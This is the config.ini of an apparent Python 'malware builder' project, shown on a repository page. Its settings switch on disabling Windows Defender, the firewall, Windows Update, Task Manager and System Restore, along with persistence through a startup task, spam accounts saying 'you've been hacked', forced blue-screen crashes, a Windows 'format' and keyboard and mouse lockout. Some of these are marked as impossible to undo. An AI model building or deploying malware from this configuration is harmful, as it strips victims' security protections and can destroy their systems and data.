-
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathconfig.ini
148 lines (117 loc) · 5.42 KB
/
config.ini
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
; --------------- Features Settings ------------------ ;
[What to create]
; This is the list of things to create, each one will be made once in a iterative fashion
; Uncomment to include the feature,
; Comment to disable the feature,
; [Format: Class.SubClass() = cure(), infect()]
; Works in a iterative fashion, change the order to change the order of execution in the malware
; Same thing goes with the curing process
; Anything with None means cannot be cured by Cure.exe
; Remove processes/features, Aka disable them
Remove() = None, close_all_windows()
Remove().Registry() = enable(), disable()
Remove().MsConfig() = enable(), disable()
Remove().TaskManager() = enable(), disable()
Remove().TimeSync() = enable(), disable()
Remove().GpEdit() = enable(), disable()
Remove().Explorer() = enable(), disable()
Remove().Notepad() = enable(), disable()
Remove().FireWall() = enable(), disable()
Remove().WindowsUpdate() = enable(), disable()
Remove().WindowsDefender() = enable(), disable()
Remove().DHCP() = enable(), disable()
Remove().Taskbar() = enable(), disable()
Remove().StartMenu() = enable(), disable()
Remove().PowerShellCMD() = enable(), disable()
Remove().Run() = enable(), disable()
Remove().ControlPanel() = enable(), disable()
Remove().SystemRestore() = enable(), disable()
Remove().Clock() = enable(), disable()
Remove().FileContextMenu() = enable(), disable()
Remove().HID() = enable(), disable()
Remove().Monitor() = None, off()
Remove().Audio() = enable(), disable()
; Spam features
Spam().Accounts() = remove(), create()
Spam().ErrorMessages() = None, create()
Spam().Desktop() = None, create()
; Destroy Classes
Destroy().Desktop() = restore(), destroy()
Destroy().BSOD() = None, crash()
Destroy().Windows() = None, format()
Destroy()._LockMouseKeyboard() = enable(), disable()
; Tomfoolery Classes
Tomfoolery() = flip_mouse(), flip_mouse()
Tomfoolery().CrazyMouse() = None, start()
Tomfoolery().CrazyTaskbar() = _revert(), start()
Tomfoolery().Clipboard() = _revert(), start()
Tomfoolery().MouseFreeze() = None, start()
Tomfoolery().CrazyGUI() = _revert_gui(), start()
Tomfoolery().WindowTeleport() = None, start()
; --------------- Advanced Settings ------------------ ;
[PyInstaller Settings]
; Exact command to use for PyInstaller
; This is the command that will be used to compile the script
; MAKE SURE TO KNOW WHAT YOU ARE DOING
; Placeholders to use is {scripts}
COMMAND: pyinstaller --onefile {scripts}
; --------------- Advanced Settings ------------------ ;
[Core Settings]
; This is the path where the script will be moved to when first executed (and will be executed from there in startup)
MOVE_TO = C:\\Users\\Hp
; This is the log level of the logger, it can be DEBUG, INFO, WARNING, ERROR, CRITICAL
LOG_LEVEL = CRITICAL
; This is the task name that will be created for startup
; Uncomment to use custom name, otherwise it will be the default random name of strings
; TASK_NAME = CustomName
; Use daemon when running threads?
USE_DAEMON = True
[Remove.MsConfig]
; This is the path of the executable MsConfig
PATH = C:\\Windows\\System32\\msconfig.exe
[Spam.Accounts]
; List of account names to create
; [DO NOT USE (") IN THE NAMES AND MAKE SURE THEY ARE SEPARATED BY COMMAS AND ARE UNIQUE]
; Each one will be made once in a iterative fashion
ACCOUNTS = you've, been, hacked, by, the, best
; Password for the accounts, this is for ALL accounts [Haven't tested if its blank, proceed with caution]
PASSWORD = MalwareBuilder2025
[Spam.Errors]
; Error message to display in the error box
ERROR_MESSAGE = This is a spam error message!
; Message box title
ERROR_TITLE = Error
; Message box type, can be one of the following: [0, 16, 32, 48, 64, 4096, 8192, 16384]
; 0 = OK, 16 = OKCancel, 32 = AbortRetryIgnore, 48 = YesNoCancel, 64 = YesNo,
; 4096 = RetryCancel, 8192 = CancelTryContinue, 16384 = YesNoCancel
ERROR_TYPE = 16
; How many times to spam the error message simultaneously
ERROR_COUNT = 10
[Spam.Desktop]
; Default name of spamming folder to create, this will be in the format {NAME #} when the code is done with it
; A name of "Spam" will create folders then files named "Spam 1", "Spam 2", "Spam 3", etc.
; This will also create files with the same name as the folder, files have nothing to do with the folder
DEFAULT_NAME = You have been hacked
; Number of times to iterate the folder creation and file creation,
; if its 50 for example, it will create 50 folders and 50 files
COUNT = 500
; List of extra special folders to create, not part of the COUNT
; [DO NOT USE (") IN THE NAMES AND MAKE SURE THEY ARE SEPARATED BY COMMAS AND ARE UNIQUE]
; Each one will be made once in a iterative fashion
; Spaces will be removed, and it will split by commas, Duplicate names will be removed
EXTRA_FOLDERS = Hackers, Anonymous, Your PC is mine, Hacked, Lol
EXTRA_FILES = You, have, been, hacked, lol
[Destroy.BSOD]
; Number of times to BSOD the system (Maximum) [Has not been tested fully]
MAX_CRASHES = 5
; Registry Path and Key to add/change to BSOD the system
; We do not recommend changing this unless you know what you are doing,
; NEVER CHANGE THE PATH OR KEY IF USED BEFORE TO ENSURE ALL ACTIONS ARE REVERSIBLE
REG_PATH = SOFTWARE\\SysBSOD
REG_KEY = BCC
; Error message to display in the crash log, as well as the cmd [Has not been tested fully]
MESSAGE = The code monkeys at our headquarters are working very hard to fix this!
[Tomfoolery.WindowTeleport]
; Timeout between each teleport in seconds (FLOAT)
TIMEOUT = 0.5
; ----------------------- END ------------------------ ;